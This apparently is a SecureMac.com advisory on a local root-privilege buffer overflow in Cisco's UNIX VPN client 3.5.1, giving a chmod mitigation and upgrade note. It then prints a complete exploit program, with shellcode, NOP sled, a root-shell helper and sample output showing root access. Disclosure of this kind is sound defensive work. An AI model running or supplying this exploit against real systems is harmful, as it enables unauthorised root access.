SecureMac.com
Cisco VPN Client For Mac OS X can be exploited locally



About Cisco VPN Client:
The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network.

Information:
Cisco's VPN Client for Mac OS X, Linux and Solaris contains a security vulnerability that a local user can exploit to gain administrative privileges. The Virtual Private Network (VPN) client lets non-Windows platforms connect over a VPN. Windows users are not affected by this particular security advisory.

A local user can exploit the Cisco UNIX VPN client, if it is installed on the computer, by executing arbitrary code that grants administrative privileges. If the setuid permissions on vpnclient have not been altered, the binary runs as root, so the exploit gives the user administrative privileges and allows them to modify any part of the system without authorization.

Fix/Update
The vpnclient vulnerability can be mitigated by altering the permissions of the binary with the chmod command. In a Terminal window, as an administrative or root account, execute the following command:

/bin/chmod 755 /usr/local/bin/vpnclient


The vulnerability has been fixed in version 3.5.2, which Cisco should make downloadable shortly via its website. Go to the Cisco Software distribution center on Cisco's web page to download the new version of the UNIX VPN client.

Exploit/Code for Cisco VPN Client for Linux/Mac OS X
The code from AngryPacket Security, vpnKILLient.c, is listed below as an example of how the exploit is executed.

/* buffer overflow for cisco's vpnclient for linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)

#include <stdio.h>
main() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}

then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient 
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)

greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;

when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi */
#include <string.h>
#include <strings.h>  /* bzero */
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";

/* read the stack pointer (i386 only) to estimate where the buffer lands */
unsigned long get_sp(void) {
    unsigned long sp;
    __asm__("mov %%esp,%0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[]) {
    int i, offset = 0;
    long addr;
    char *buf, *ptr;

    if (argc > 1) offset = atoi(argv[1]);

    buf = (char *)malloc(sizeof(char) * LEN);
    bzero(buf, LEN);
    addr = get_sp() - offset;
    printf("addr: 0x%lx, offset: %d\n", addr, offset);

    /* fill the whole buffer with the guessed return address */
    for (i = 0; i < LEN; i += 4) {
        *(long *)&buf[i] = addr;
    }

    /* the first half becomes a NOP sled */
    for (i = 0; i < (LEN / 2); i++) {
        *(buf + i) = NOP;
    }

    /* the shellcode sits in the middle of the sled */
    ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
    for (i = 0; i < strlen(shell); i++) {
        *(ptr++) = shell[i];
    }
    buf[LEN - 1] = '\0';

    /* the overlong "connect" argument is what overflows the setuid client */
    execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, (char *)NULL);
    return 0;
}


More details can be obtained by visiting the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client

Special thanks goes out to Jess K. Frykholm for making us aware of this security issue!

All material (c) 2014 SecureMac.com and respected owners